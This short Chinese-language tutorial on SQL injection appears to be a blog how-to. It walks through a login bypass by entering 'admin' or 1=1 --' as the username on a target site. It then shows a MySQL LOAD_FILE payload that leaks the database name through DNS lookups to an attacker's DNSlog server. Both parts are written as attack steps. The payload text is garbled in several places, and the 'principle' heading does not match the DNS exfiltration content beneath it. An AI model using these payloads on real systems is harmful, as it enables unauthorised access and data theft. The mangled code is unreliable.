步骤一
打开目标站点,输入用户名密码,查看返回结果
步骤二
在用户名处输入”admin’ or 1=1 – ”,输入任意密码。
注:注意“–”符号,后面必须要加空格,否则命令会失效
步骤三
登陆成功
sql注入万能密码原理
在无直接回显数据的情况下,我们可以通过DNS解析来传递数据。在MySQL中,我们可以使用LOAD_ FILE( )来让服务器发送DNS解析。
1.客户端发送HTTP请求http://x.cnid=1AND LOAD_FILE(CONCATI’IM’,DATABASE0,‘1.x.cn\a’))
2.拼接SQL语句发送给数据库执行SELECT * FROM users WHERE id=1 AND LOAD FILE(CONCAT("MIY,DATABASEO,‘1.nse2lf.ceye.iol\a’))
3.数据库执行SQL语句后,发送DNS解析到入侵者服务器入侵者通过DNSLOG可以查看到解析历史,得到数据